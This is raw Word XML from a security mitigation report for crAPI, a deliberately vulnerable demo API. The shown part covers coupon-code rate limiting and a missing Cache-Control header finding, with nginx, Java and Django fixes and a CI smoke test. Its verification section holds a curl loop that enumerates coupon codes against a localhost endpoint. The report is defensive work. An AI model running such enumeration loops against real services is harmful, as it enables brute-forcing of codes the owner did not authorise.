        <w:t xml:space="preserve">Terminal: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build crapi-community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up -d crapi-community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1. Enumeration: 10 sequential guesses must all fail (new codes are random)</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for n in 060 061 062 063 064 065 066 067 068 069; do</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curl -s -o /dev/null -w "TRAC$n %{http_code}\n"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http://localhost:8888/community/api/v2/coupon/validate-coupon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"{\"coupon_code\":\"TRAC$n\"}"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done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Expected: all 403/404, no 200</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2. Rate limit triggers after 5 failed attempts in a minute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for i in {1..7}; do</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curl -s -o /dev/null -w '%{http_code} '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-X POST http://localhost:8888/community/api/v2/coupon/validate-coupon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'{"coupon_code":"INVALIDXX"}'</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done; echo</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Expected: 403 403 403 403 403 429 429</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="70AD47" w:sz="4"/>
          <w:bottom w:val="single" w:color="70AD47" w:sz="4"/>
          <w:left w:val="single" w:color="70AD47" w:sz="16"/>
          <w:right w:val="single" w:color="70AD47" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="E2EFDA" w:val="clear"/>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="385723"/>
        </w:rPr>
        <w:t xml:space="preserve">✔ VERIFY:  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Enumeration of the previously valid TRAC0xx codes must return no 200s. The 6th invalid attempt in 60 seconds from one source must return HTTP 429. All historical codes must have been rotated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-08   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Missing Cache-Control on Sensitive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Severity</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OWASP Mapping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API8:2023 — Security Misconfiguration</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Service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gateway-service (nginx) — applies to all proxied services</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Affected Endpoints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POST /community/api/v2/community/posts, POST /community/api/v2/coupon/validate-coupon, POST /workshop/api/merchant/contact_mechanic, POST /workshop/api/shop/orders/return_order, GET /workshop/api/shop/products</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BFBFBF" w:sz="4"/>
              <w:left w:val="single" w:color="BFBFBF" w:sz="4"/>
              <w:bottom w:val="single" w:color="BFBFBF" w:sz="4"/>
              <w:right w:val="single" w:color="BFBFBF" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="DEEBF7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Pynt Finding</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Responses omit Cache-Control header — sensitive bodies may be cached by intermediaries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">None of the affected responses carry a Cache-Control header. CDNs, browsers and corporate proxies may therefore cache responses containing user-specific data — orders, posts, coupon validations — and serve them to the wrong user. The fix is centralised at the gateway so every backend service benefits at once.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept (Pynt)</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-I 'http://host.docker.internal:8888/workshop/api/shop/products'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$TOKEN" | grep -i cache</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 (no Cache-Control header in the response)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a default no-store header at the nginx layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the default Cache-Control to no-store for every proxied response. Public endpoints (e.g. the product catalogue) can opt back into a public cache with a more specific directive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/gateway-service/api-gateway.conf</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Inside the server { } block, before the proxy locations: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add_header Cache-Control "no-store" always;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add_header Pragma        "no-cache" always;   # HTTP/1.0 compatibility</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For genuinely public endpoints, override per-location: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location ^~ /workshop/api/shop/products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add_header Cache-Control "public, max-age=60" always;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proxy_pass http://crapi-workshop:8000;</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100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Also set the header at the application layer (defence in depth)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">The gateway header is the primary control. The application-layer header guards against direct-to-service calls in development and against any future gateway misconfiguration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/identity/src/main/java/com/crapi/config/CacheControlFilter.java</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@Component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public class CacheControlFilter extends OncePerRequestFilter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@Override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protected void doFilterInternal(HttpServletRequest req,</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HttpServletResponse res, FilterChain chain)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throws ServletException, IOException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Default to no-store; the gateway may override for public paths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res.setHeader("Cache-Control", "no-store");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res.setHeader("Pragma", "no-cache");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chain.doFilter(req, res);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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/workshop/crapi/middleware.py</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class CacheControlMiddleware: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def __init__(self, get_response):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self.get_response = get_response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def __call__(self, request):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response = self.get_response(request)</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response.headers.setdefault("Cache-Control", "no-store")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response.headers.setdefault("Pragma", "no-cache")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return response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Register in settings.py MIDDLEWARE list:</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"crapi.middleware.CacheControlMiddleware",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a contract test to CI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a smoke test that confirms the header is present on every sensitive endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/workflows/security-smoke.yml  (append to the existing job)</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name: Cache-Control must be no-store on sensitive endpoints</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run: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TOKEN=$(curl -s -X POST http://localhost:8888/identity/api/auth/login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'Content-Type: application/json'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-d '{"email":"test@test.com","password":"Password123!"}' | jq -r .token)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for URL in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/community/api/v2/community/posts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/community/api/v2/coupon/validate-coupon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/workshop/api/merchant/contact_mechanic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/workshop/api/shop/orders/return_order ; do</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HDR=$(curl -sI "http://localhost:8888$URL"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$TOKEN"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 tr -d '\r' | grep -i '^cache-control:' || true)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if ! echo "$HDR" | grep -qi 'no-store'; then</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echo "FAIL: $URL missing Cache-Control: no-store ($HDR)"; exit 1</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fi</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done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rebuild and verify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D9D9D9" w:sz="4"/>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build crapi-gateway-service crapi-identity crapi-workshop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docker compose -f deploy/docker/docker-compose.yml up -d crapi-gateway-service crapi-identity crapi-workshop</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Sensitive endpoint — must have no-store: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-sI http://localhost:8888/workshop/api/merchant/contact_mechanic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$TOKEN" | grep -i cache-control</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Expected: Cache-Control: no-store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Public catalogue — may use a short public cache:</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curl -sI http://localhost:8888/workshop/api/shop/products \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="D9D9D9" w:sz="4"/>
          <w:right w:val="single" w:color="D9D9D9" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: Bearer $TOKEN" | grep -i cache-control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="single" w:color="D9D9D9" w:sz="4"/>
          <w:left w:val="single" w:color="D9D9D9" w:sz="4"/>
          <w:right w:val="single" w:color="D9D9D9" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expected: Cache-Control: public, max-age=60</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="70AD47" w:sz="4"/>
          <w:bottom w:val="single" w:color="70AD47" w:sz="4"/>
          <w:left w:val="single" w:color="70AD47" w:sz="16"/>
          <w:right w:val="single" w:color="70AD47" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="E2EFDA" w:val="clear"/>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="385723"/>
        </w:rPr>
        <w:t xml:space="preserve">✔ VERIFY:  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Every sensitive endpoint must return Cache-Control: no-store. Public, non-sensitive endpoints may use a short public max-age. The CI smoke test must pass before the finding is closed.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crAPI Vulnerability Mitigation Report  |  Confidential — Pynt 2026-04-21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crAPI Implementation-Ready Mitigation Report</dc:title>
  <dc:creator>Security Engineering</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-13T09:39:54.475Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-13T09:39:54.490Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>